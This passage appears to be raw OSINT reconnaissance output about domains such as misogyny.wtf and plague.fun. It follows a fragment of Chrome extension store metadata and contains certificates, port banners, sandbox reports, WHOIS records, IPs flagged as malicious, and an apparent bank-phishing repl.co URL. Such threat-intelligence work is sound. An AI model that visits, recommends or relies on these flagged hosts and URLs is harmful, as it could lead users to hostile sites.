Believe in yourself, see the goalkeeper and the wall that you really need to pass.", "icon": "https://lh3.googleusercontent.com/jluPSHf4IjMjgqd0rNVMuTfq1f4786G1iiu5koA7B4jo2el8s3MKIzpNpo-cmXd9ET9SnGZW=w128-h128-e365", "rating_users": 23, "name": "Kick Return Football"}, "ghabmoobnekiapiffifjdhgccbfbdgek": {"rating": 3.48, "users": 2000, "platform": "", "short_description": "The game features a map. We jumping into this map with a character we choose. We use a plane and parachute to jump.", "icon": "https://lh3.googleusercontent.com/1Bu9adHav1bGbuWBhJeu4kfPJBdLBVCAzWxwtM-v_ci7_s-pHSz8n183U1l43fcwW-LDJq0uWO3slInJjRWFMY5ToA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 25, "name": "PUBG Craft Battlegrounds Game New Tab"}, "klaadibaiofhdchfigelkbnoilocpapa": {"rating": 1.7822802, "users": 100000, "platform": "", "short_description": "New tab themes with Clash Royale HD wallpapers made by fans for fans of Clash Royale.", "icon": "https://lh3.googleusercontent.com/Zz6C2fCYPAHQ9G9Z9rnDfohq1lnrZPvzCCT0vZkxEOnEOb-35_EZkNvdjWX8ALQpAqLlTdEul2A=w128-h128-e365", "rating_users": 2912, "name": "Clash Royale Wallpaper HD New Tab Themes"}, "fedenmemklhminihgehhicdmabenpkhd": {"rating": 3.6133332, "users": 1000, "platform": "", "short_description": "Fortnite wallpapers extension offers great images with every new tab and was made for all fans of Fortnite wallpaper.", "icon": "https://lh3.googleusercontent.com/DDwo5cVMwI5AIhAp_pmp6dCl7JL38sHImtQCS2gjwmiO2iGtwrmdQfst1YlkUq2wQE-N4ixZzwTyr2lpHWEXdp_tfA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 75, "name": "Fortnite Game Full HD Wallpaper New Tab"}, "dephgmdllolfchlbencncbldjdnkdbok": {"rating": 3.1818182, "users": 735, "platform": "", "short_description": "Minecraft Classic wallpaper extension offers great images with every new tab and was made for all fans of Minecraft.", "icon": 
"https://lh3.googleusercontent.com/dM50b9FV4NBcF-X2FZPwy0kUtjr5uAf_1wvRVnVhPHiT0OzLRE6h7NCKBYDrgwrVikJc1qWIZBw91eUo-lAYKJ7F=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 11, "name": "Minecraft Classic HD Wallpapers New Tab"}, "hbioademamgcidpknbkilibejpjhhoak": {"rating": 3.8666666, "users": 0, "platform": "", "short_description": "Among Us Skin wallpapers extension offers great images with every new tab and was made for all fans of Among Us.", "icon": "https://lh3.googleusercontent.com/li2kmYtixEszT4j4Le_YmQs49UUBS8X3gG00bFEbdNf16BEBDOxwf6doLGLTN3dBepgsAwyg0at3Wn2rhnoazmLp=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 45, "name": "Among Us Skin HD Wallpaper New Tab"}, "omihfdplpkjcgdkdhoeaclgappcanifp": {"rating": 3.3085105, "users": 0, "platform": "", "short_description": "Among us wallpaper extension offers great images with every new tab and was made for all fans of among us.", "icon": "https://lh3.googleusercontent.com/YaKEbQcoP38TLla09rRswmU6hU8dR1-9nHTE7LYzAPwCm5_pK4TEjA6grkmDEODxAr6_1m-2N9EQbjC9suBfKzkEtA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 94, "name": "Among US Game HD Wallpapers New Tab"}, "dnnkelgikdlinelhmlpipkipmnfeplhp": {"rating": 4.0833335, "users": 284, "platform": "", "short_description": "Cat wallpapers extension offers great images with every new tab and was made for all fans of Cat.", "icon": "https://lh3.googleusercontent.com/I_EAJDo-eiJhq-8CLSqi3_SGwaA57lw48w0g_SRK3a7BS3vBZvWH0o6HBCMarfyB9zWaJRlDcgaY5E3P4k3G6Vop=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 24, "name": "Cat HD Wallpaper New Tab"}, "edjlmaphlhecmhhdgfooaiknmiiokhbe": {"rating": 4.882353, "users": 3000, "platform": "", "short_description": "Replace your new tab with the XXXTentacion Custom page, with bookmarks, apps, games and XXXTentacion wallpaper.", "icon": "https://lh3.googleusercontent.com/iTtrSQ19v--i4xFMwmNKmgJukVnAXaMsn0SbXP5zyFUaglnAbU0W6fdl8BkjbZrQ9-6mduJEO_kH7xxQrYGfgkIjrA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 51, "name": 
"XXXTentacion 4K Wallpapers New Tab"}, "fiaeliimiajnkmkncccmccnlcpcelpee": {"rating": 3.5, "users": 2000, "platform": "", "short_description": "Roblox wallpaper extension offers great images with every new tab and was made for all fans of Roblox wallpapers.", "icon": "https://lh3.googleusercontent.com/ChzPepItXsUfcsLgwHN82g5n1KCZo_ssLSO4u-NZqZLypgQvBs-Zrbv7V8r6q6py9pAlZrnm-FRAKYgQD-BqofVR=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 22, "name": "Roblox Game HD Wallpapers New Tab"}, "oefnjcadfloohhbchkdmgoecoohonhpn": {"rating": 4.7777777, "users": 1000, "platform": "", "short_description": "Install PUBG HD Wallpapers New Tab Theme ang get HD images of PlayerUnknown's Battlegrounds Battle Royale gameplay.", "icon": "https://lh3.googleusercontent.com/U37Bdee8tejEzgCfbkF51-OLn6ENkBDJvHobXQLQG0hDXCyxQVHIZ8LffkazMFHdpZJJqp4XSbooLtSKGmgvmebncQs=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 36, "name": "PUBG HD Wallpapers New Tab Theme"}, "bhnklgpilfifbkahialpmbnhmpoaiomh": {"rating": 3.7777777, "users": 0, "platform": "", "short_description": "The Simpsons wallpapers extension offers great images with every new tab and was made for all fans of Simpsons.", "icon": "https://lh3.googleusercontent.com/oGZpMcoYYMqEocHdrSNjmlNd_fjhOPUZE-3XZw6zRTa4n2rlYn8OWUGT7v2A_lJps7K4KpjQGSAzdBzEaspSAxCYQhA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 27, "name": "The Simpsons 4K Wallpapers New Tab"}, "cadippdoonnecjfembbfokijpncaiefh": {"rating": 3.5089285, "users": 3000, "platform": "", "short_description": "Easter wallpapers extension offers great images with every new tab and was made for all fans of Easter.", "icon": "https://lh3.googleusercontent.com/-pcJqD8Bf8eTrfQ0S58g3FO29D1OqhWZmKRcZzd4FriR60v1xlIZwhU-yKoGx_tOLCEy97QVIukcsX_OxbztNVPNAA=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 112, "name": "Easter HD Wallpaper New Tab"}, "khiclbcknnlgfglgablmakmkhpnclolo": {"rating": 3.0769231, "users": 443, "platform": "", "short_description": "PUBG Battle Royale wallpapers 
extension offers great images with every new tab and was made for all fans of PUBG.", "icon": "https://lh3.googleusercontent.com/PSigIBqr7dDCtEnN-xQ9DfASfpO-qdYWFcpf0WYRNEyy_tlFCpaguFXk5ahrW_L4yNe6SHQwM2mnMYnGQStollZlcLM=w128-h128-e365-rj-sc0x00ffffff", "rating_users": 13, "name": "PUBG Battle Royale HD Wallpapers New Tab"}}, "manifest": {"update_url": "https://clients2.google.com/service/update2/crx", "description": "Includes HD wallpaper images of the game Plague Inc on every new tab.", "icons": {"128": "icon128.png", "32": "icon32.png", "48": "icon48.png", "16": "icon16.png"}, "chrome_url_overrides": {"newtab": "newtab.html"}, "background": {"scripts": ["background.js"]}, "version": "0.37", "manifest_version": 2, "permissions": ["webNavigation", "tabs", "https://home.newtabgallery.com/*"], "browser_action": {"default_icon": {"32": "icon32.png", "16": "icon16.png"}, "default_title": "Plague Inc HD Wallpapers New Tab Theme"}, "name": "Plague Inc HD Wallpapers New Tab Theme"}}, "extension_id": "lgglnjfaglblnglkdmmdhmjcpplmjdfj"}, {"platform": "Chrome", "version": "1.0.2", "data": {"entrypoints": {"chrome.tabs.query": {"/tmp/lgglnjfaglblnglkdmmdhmjcpplmjdfj_1.0.2/newtab.js": [3]}}, "webstore": {"website": "", "rating": 4, "privacy_policy": "https://newtabgallery.com/privacy-policy", "last_updated": "2021-12-22", "name": "Plague Inc HD Wallpapers New Tab Theme", "price": "", "offered_by": "" 2022-12-18 00:07:19 HTTP Status Code No Web Spider 0 0 3 0 None 200 http://misogyny.wtf:2020/css/parser.css 2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2052 188.114.97.1 2022-12-18 00:06:07 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 04:d6:9e:d2:88:e9:c1:89:74:28:65:2d:6e:88:09:50:9f:4f Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Jul 23 20:47:28 2022 GMT Not After : Oct 21 20:47:27 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key 
Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:e2:0d:a7:a1:bf:81:84:fe:a2:ff:8d:36:67:3d: 94:76:0b:74:ea:c9:c4:15:da:67:48:de:38:52:f4: 66:f1:cf:58:f5:ed:3b:fb:e6:93:95:6d:62:df:c4: e1:a5:f5:b7:4f:c3:28:52:2d:05:bb:ed:9b:1c:5a: e7:bc:37:9b:b8 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 4E:89:67:D2:CE:A1:37:68:F8:76:14:2C:47:E7:EC:A8:A1:05:92:71 X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:65:02:31:00:f5:9a:74:88:68:99:22:03:d6:91:70:83:d9: b3:f5:1d:ac:7e:f1:78:f9:c4:0e:47:4f:80:11:6c:43:f5:51: 80:08:05:0b:44:92:ff:35:92:09:bc:aa:c7:a5:ad:98:9b:02: 30:11:d1:8b:02:89:a9:55:4e:fa:1e:63:01:dd:1c:92:d3:03: 99:e5:5f:ad:f4:fb:2f:0f:19:cc:c1:31:98:97:36:b1:c3:97: 96:91:aa:01:42:36:42:ec:0a:5f:82:af:53 2022-12-18 00:18:19 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.7:80 188.114.97.0/24 2022-12-18 00:22:14 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2e68629bd2d58-ORD Content-Encoding: gzip 172.67.169.215 2022-12-18 00:25:06 Physical Location No 
MetaDefender 0 0 1 0 None Zuerich, Switzerland 51.103.210.236 2022-12-18 00:21:13 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77b1356f9f1a22f3-ORD 188.114.97.0 2022-12-18 00:18:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.11:8080 188.114.97.0/24 2022-12-18 00:12:00 Physical Location No ipapi.co 1 0 1 0 None Zurich, Zurich, ZH, Switzerland, CH 51.103.210.236 2022-12-18 00:05:02 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://www.schooltube.com/media/t/1_m2o42vv0', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_c5c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_c5c_IE_EarlyTabStart_0xcb4_Mutex"\n "IsoScope_c5c_IESQMMUTEX_0_303"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_c5c_IESQMMUTEX_0_331"\n "IsoScope_c5c_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_c5c_ConnHashTable<3164>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3164"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"192.58.252.50:443"\n "151.139.236.246:80"\n "52.201.188.11:80"\n "172.64.194.26:443"\n "99.84.238.47:443"\n "172.217.13.226:443"\n "172.217.164.138:443"\n "23.63.245.11:443"\n "184.26.80.228:443"\n "104.17.213.204:443"\n "13.35.126.201:80"\n "142.250.73.195:80"\n "13.35.126.192:80"\n "172.217.7.194:443"\n "99.84.226.197:443"\n "159.127.41.178:443"\n "134.209.129.254:443"\n "204.237.133.116:443"\n "74.118.184.100:443"\n "13.56.90.232:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-71', u'name': u'Sets a windows hook', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1179', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1179', u'relevance': 10, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" sets a global windows hook with filter "WH_MOUSE_LL"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-25', u'name': u'Spawns new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "https://www.schooltube.com/media/t/1_m2o42vv0" (UID: 00065473-00003164)\n Spawned process "iexplore.exe" with commandline "SCODEF:3164 CREDAT:275457 /prefetch:2" (UID: 00065504-00001828)'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, 
u'description': u'"sslcom.ocsp-certum.com"\n "ocsps.ssl.com"\n "o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "isrg.trustid.ocsp.identrust.com"\n "ocsp.godaddy.com"\n "ocsp.sectigo.com"'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-103', u'name': u'Spawns new processes that are not known child processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 9, u'description': u'Spawned process "iexplore.exe" with commandline "https://www.schooltube.com/media/t/1_m2o42vv0" (UID: 00065473-00003164)\n Spawned process "iexplore.exe" with commandline "SCODEF:3164 CREDAT:275457 /prefetch:2" (UID: 00065504-00001828)'}, {u'category': u'General', u'origin': u'Monitored Target', u'identifier': u'target-67', u'name': u'Process launched with changed environment', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 9, u'description': u'Process "iexplore.exe" (UID: 00065473-00003164) was launched with new environment variables: "PATH="%PROGRAMFILES%\\Internet Explorer;""\n Process "iexplore.exe" (UID: 00065473-00003164) was launched with modified environment variables: "CommonProgramFiles, PROCESSOR_ARCHITECTURE, ProgramFiles"\n Process "iexplore.exe" (UID: 00065473-00003164) was launched with missing environment variables: "PROCESSOR_ARCHITEW6432"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "5_media_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file 
"urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Hook Detection', u'identifier': u'hooks-8', u'name': u'Installs hooks/patches the running process', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1179', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1179', u'relevance': 10, u'threat_level': 0, u'type': 11, u'description': u'"iexplore.exe" wrote bytes "d04f74f3fe070000f01dc53f01000000101ec53f01000000e036c53f01000000501ec53f010000000000000000000000" to virtual address "0x3FC58000"\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0x3FC571C0"\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFDAD05A8" (part of module "OLEAUT32.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFD962390" (part of module "GDI32.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFB5618D0" (part of module "COMCTL32.DLL")\n "iexplore.exe" wrote bytes "4068d9f4fe070000" to virtual address "0xFD6FBEA8" (part of module "OLE32.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xF3F22D78" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "4068d9f4fe070000" to virtual address "0xFDFE1AF0" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "b062d9f4fe070000" to virtual address "0xFDFE1C30" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFDFE1F30" (part of module "SHELL32.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFE995348" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "4068d9f4fe070000" to virtual address "0xFE995748" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "5069d9f4fe070000" to virtual address "0xF3F240E0" (part of module "IEFRAME.DLL")\n "iexplore.exe" wrote bytes "d060d9f4fe070000" to virtual address "0xFB561CC0" (part of module "COMCTL32.DLL")\n 
"iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFD6FBC38" (part of module "OLE32.DLL")\n "iexplore.exe" wrote bytes "b061d9f4fe070000" to virtual address "0xFE9955C0" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "401cd5f4fe070000" to virtual address "0xFD041318" (part of module "MSCTF.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xFDAD0A30" (part of module "OLEAUT32.DLL")\n "iexplore.exe" wrote bytes "b062d9f4fe070000" to virtual address "0xFE9955B8" (part of module "SHLWAPI.DLL")\n "iexplore.exe" wrote bytes "00efd5f4fe070000" to virtual address "0xF3F23D50" (part of module "IEFRAME.DLL")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5_media_1_.bin" has type "data"\n "akamaiHDPlugin_1_.swf" has type "Macromedia Flash data (compressed) version 11"\n "urlblockindex_1_.bin" has type "data"\n "doubleClickPlugin_1_.swf" has type "Macromedia Flash data (compressed) version 14"\n "kdp3_1_.swf" has type "Macromedia Flash data (compressed) version 11"\n "259LO3T4.txt" has type "ASCII text"\n "8HX94XNC.txt" has type "ASCII text"\n "X3V3E8AoI9wAAGzuHGYAAABxAxkAAAIB_1_.gif" has type "GIF image data version 89a 1 x 1"\n "Y34Q5ZMD.txt" has type "ASCII text"\n "TB6DU83J.txt" has type "ASCII text"\n "NQA3I7XW.txt" has type "ASCII text"\n "DHOLH8J3.txt" has type "ASCII text with very long lines"\n "UD1NK7R3.txt" has type "ASCII text"\n "P0YJ9JZK.txt" has type "ASCII text"\n "6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27" has type "data"\n "DU0TAQEJ.txt" has type "ASCII text"\n "78ZWUNLA.txt" has type "ASCII text"\n "prebid_1_.js" has type "ASCII text with very long lines"\n "bl-04a3385-0e6d5adc_1_.js" has type "ASCII text with very long lines"\n 
"A865H115.txt" has type "ASCII text with very long lines"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-2', u'name': u'Creates new processes', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 8, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" is creating a new process (Name: "%PROGRAMFILES%\\(x86)\\Internet Explorer\\iexplore.exe"\n Handle: )'}, {u'category': u'Ransomware/Banking', u'origin': u'Binary File', u'identifier': u'binary-10', u'name': u'The input sample dropped very many files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'The input sample dropped 1047 files (often an indicator for ransomware)'}, {u'category': u'Network Rela 172.67.190.129 2022-12-18 00:09:27 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.8:8443 188.114.96.0/24 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.7.179 2022-12-18 00:02:50 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:6b:c5:5a:1c:aa:de:11:25:3a:85:ac:27:46:ac:84:c2:a9 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Oct 30 18:19:31 2022 GMT Not After : Jan 28 18:19:30 2023 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:01:01:6e:30:77:4b:4a:76:be:97:94:3e:d7:af: bb:89:fe:9f:c9:f2:e8:ed:d4:13:6a:74:bb:54:79: 
[remaining public key bytes omitted]
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
  X509v3 Key Usage: critical
    Digital Signature
  X509v3 Extended Key Usage:
    TLS Web Server Authentication, TLS Web Client Authentication
  X509v3 Basic Constraints: critical
    CA:FALSE
  X509v3 Subject Key Identifier:
    E9:2C:D8:38:4D:A7:AE:7E:D2:DB:0C:69:89:B1:06:B2:70:BB:A0:0E
  X509v3 Authority Key Identifier:
    keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
  Authority Information Access:
    OCSP - URI:http://e1.o.lencr.org
    CA Issuers - URI:http://e1.i.lencr.org/
  X509v3 Subject Alternative Name:
    DNS:*.plague.fun, DNS:plague.fun
  X509v3 Certificate Policies:
    Policy: 2.23.140.1.2.1
    Policy: 1.3.6.1.4.1.44947.1.1.1
      CPS: http://cps.letsencrypt.org
  CT Precertificate Poison: critical
    NULL
Signature Algorithm: ecdsa-with-SHA384 [signature bytes omitted]
Source Data: plague.fun

2022-12-18 00:05:56 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report for submission https://mispost.repl.co/ omitted] | 34.149.204.188
2022-12-18 00:04:11 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 188.114.97.0:443 | 188.114.97.0
2022-12-18 00:05:36 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [raw Hybrid Analysis sandbox report for submission https://protaltransaccionalbancooccidente.portaloccid.repl.co/ omitted] | 34.149.204.188
2022-12-18 00:04:12 | Linked URL - Internal | No | Hybrid Analysis | 4 | 0 | 1 | 0 | None | http://misogyny.wtf:2020/copy | misogyny.wtf
2022-12-18 00:16:46 | Co-Hosted Site | No | ThreatMiner | 0 | 0 | 2 | 0 | None | 03086f92-df30-4cdf-b616-eecb6721ccc7.id.repl.co | 34.149.204.188
2022-12-18 00:34:43 | Malicious Affiliate IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [81.88.52.231] https://www.virustotal.com/en/ip-address/81.88.52.231/information/ | 81.88.52.231
2022-12-18 00:09:27 | Open TCP Port | No | LeakIX | 0 | 0 | 2 | 0 | None | 34.149.204.188:443 | 34.149.204.188
2022-12-18 00:32:11 | Malicious Affiliate IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [81.88.52.222] https://www.virustotal.com/en/ip-address/81.88.52.222/information/ | 81.88.52.222
2022-12-18 00:21:51 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - | 172.67.137.37
2022-12-18 00:24:06 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | 7a26cfb315a34ab485d0721288efdfea.protect@withheldforprivacy.com | (Source Data: WHOIS record for PLAGUE.ME, below)
  Domain Name: PLAGUE.ME
  Registry Domain ID: D425500000338876015-AGRS
  Registrar WHOIS Server: whois.namecheap.com
  Registrar URL: www.namecheap.com
  Updated Date: 2022-04-09T21:19:21Z
  Creation Date: 2022-02-08T11:50:02Z
  Registry Expiry Date: 2023-02-08T11:50:02Z
  Registrar Registration Expiration Date:
  Registrar: NameCheap, Inc.
  Registrar IANA ID: 1068
  Registrar Abuse Contact Email: abuse@namecheap.com
  Registrar Abuse Contact Phone: +1.6613102107
  Reseller:
  Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  Registrant Organization: Privacy service provided by Withheld for Privacy ehf
  Registrant State/Province: Capital Region
  Registrant Country: IS
  Name Server: DNS1.REGISTRAR-SERVERS.COM
  Name Server: DNS2.REGISTRAR-SERVERS.COM
  DNSSEC: unsigned
  URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  >>> Last update of WHOIS database: 2022-12-18T00:21:21Z <<<
  For more information on Whois status codes, please visit https://icann.org/epp

  Domain name: plague.me
  Registry Domain ID: D425500000338876015-AGRS
  Registrar WHOIS Server: whois.namecheap.com
  Registrar URL: http://www.namecheap.com
  Updated Date: 0001-01-01T00:00:00.00Z
  Creation Date: 2022-02-08T11:50:02.00Z
  Registrar Registration Expiration Date: 2023-02-08T11:50:02.00Z
  Registrar: NAMECHEAP INC
  Registrar IANA ID: 1068
  Registrar Abuse Contact Email: abuse@namecheap.com
  Registrar Abuse Contact Phone: +1.9854014545
  Reseller: NAMECHEAP INC
  Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
  Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
  Domain Status: addPeriod https://icann.org/epp#addPeriod
  Registry Registrant ID:
  Registrant Name: Redacted for Privacy
  Registrant Organization: Privacy service provided by Withheld for Privacy ehf
  Registrant Street: Kalkofnsvegur 2
  Registrant City: Reykjavik
  Registrant State/Province: Capital Region
  Registrant Postal Code: 101
  Registrant Country: IS
  Registrant Phone: +354.4212434
  Registrant Phone Ext:
  Registrant Fax:
  Registrant Fax Ext:
  Registrant Email: 7a26cfb315a34ab485d0721288efdfea.protect@withheldforprivacy.com
  Registry Admin ID:
  Admin Name: Redacted for Privacy
  Admin Organization: Privacy service provided by Withheld for Privacy ehf
  Admin Street: Kalkofnsvegur 2
  Admin City: Reykjavik
  Admin State/Province: Capital Region
  Admin Postal Code: 101
  Admin Country: IS
  Admin Phone: +354.4212434
  Admin Phone Ext:
  Admin Fax:
  Admin Fax Ext:
  Admin Email: 7a26cfb315a34ab485d0721288efdfea.protect@withheldforprivacy.com
  Registry Tech ID:
  Tech Name: Redacted for Privacy
  Tech Organization: Privacy service provided by Withheld for Privacy ehf
  Tech Street: Kalkofnsvegur 2
  Tech City: Reykjavik
  Tech State/Province: Capital Region
  Tech Postal Code: 101
  Tech Country: IS
  Tech Phone: +354.4212434
  Tech Phone Ext:
  Tech Fax:
  Tech Fax Ext:
  Tech Email: 7a26cfb315a34ab485d0721288efdfea.protect@withheldforprivacy.com
  Name Server: dns1.registrar-servers.com
  Name Server: dns2.registrar-servers.com
  DNSSEC: unsigned
